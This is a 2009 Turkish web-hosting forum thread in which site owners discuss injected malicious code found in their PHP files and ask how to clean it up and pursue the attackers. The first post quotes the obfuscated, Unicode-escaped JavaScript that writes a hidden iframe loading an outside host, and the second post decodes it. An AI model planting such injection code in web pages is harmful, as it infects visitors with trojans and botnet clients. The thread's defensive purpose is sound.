• 03-04-2009, 10:28:30
    #1
    Arkadaşlar 3-5 emek haramisi siteme saldırı yapıyor ve index.php ve admin.php dosyalarının headerlerine attıkları kodlar bunlar.

    type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script><?php
    Nasıl bir savunma yapmam lazım sitenin hangi açığından girmiş olabilirler?

    Birde bu insanları mahkemeye vermek için nasıl bir yol izlemeliyim. Forumda bir çok arkadaş hakkını yasal yollardan aradı ve aldı neler yapabilirim
  • 03-04-2009, 13:02:29
    #2
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Kodun açık kaynağı:

    <iframe src='http://music24shop.net/2/in.php' width='0' height='0' style='display:none'></iframe>
  • 03-04-2009, 13:14:08
    #3
    Yönetici onayı bekliyor
    http://music24shop.net/2/ buradan biraz ne olduğu anlaşılıyor.
    Trojan yayıyorlar ama bu yaydıkları şey ne işe yarıyor anlamadım.
    dur biraz serverıyla oynayalım ,)
  • 03-04-2009, 19:35:48
    #4
    sanırım phpmyadminden db ne ulaşmış ve orada bypass diye tablo oluşturmuşlar bypass shell dir ve bu sayede senin db adı üzerinden serverdaki bütün siteleri hackleyebilirler...aynı sorun bendede vardı o tabloyu sildim sorun giderildi..
  • 03-04-2009, 21:47:55
    #5
    phpmyadmin de olağan dışı hiç bir drum yok anlayamadım..Garip olan bir başka durumda diğer sitelerimden bazılarında da bu tür bir problem var frame virüsü yemişim.. Sistemlerin 2 tanesi DLE bir tanesi WP bilgisayarlarda virüs yok. olsa bağlandığım diğer 6 siteden birisin de daha olurdu. scriptlerde açık var desem dle de olup wp de olmazdı baya şaşırdım.

    Nasıl çözebiliriz bu durumu ??
  • 05-04-2009, 00:33:25
    #6
    Bu sorun bendede var 1 nisan günü yayılan virüs bu sanırım. big_turk'ün dediği gibi sql larda ekstra bir bölüm yok, dosyalardaki iframeleri temizleyip 555 yapıyorum, ama genede ertesi günü mod 755 yapılıp aynen iframe atılıyor.

    bu sorunu çözen arkadaşlar yardımcı olursa sevinirim.
  • 05-04-2009, 00:40:54
    #7
    botnet clientlerini dağıtıyorlar.Bariz zombie çoğaltma yollarındandır. İlk olarak kendi bilgisayarınızın temiz olduğundan emin olun sonra sunucunuzda root yetkisine sahip olan kişilerin bilgisayarlarının temiz olduğundan emin olun.Bunları hallettiğiniz taktirde kodun yerleştiği dosyayı editlediğinizde sorun çözülecektir.
  • 05-04-2009, 00:51:11
    #8
    Normalde ghost atıyorum şimdi 0 dan bir format atıp deneyeyim, teşekkürler.
  • 05-04-2009, 01:56:25
    #9
    Üyeliği durduruldu
    PoSeiDoN adlı üyeden alıntı: mesajı görüntüle
    Index of /2 buradan biraz ne olduğu anlaşılıyor.
    Trojan yayıyorlar ama bu yaydıkları şey ne işe yarıyor anlamadım.
    dur biraz serverıyla oynayalım ,)
    heykır mısın ?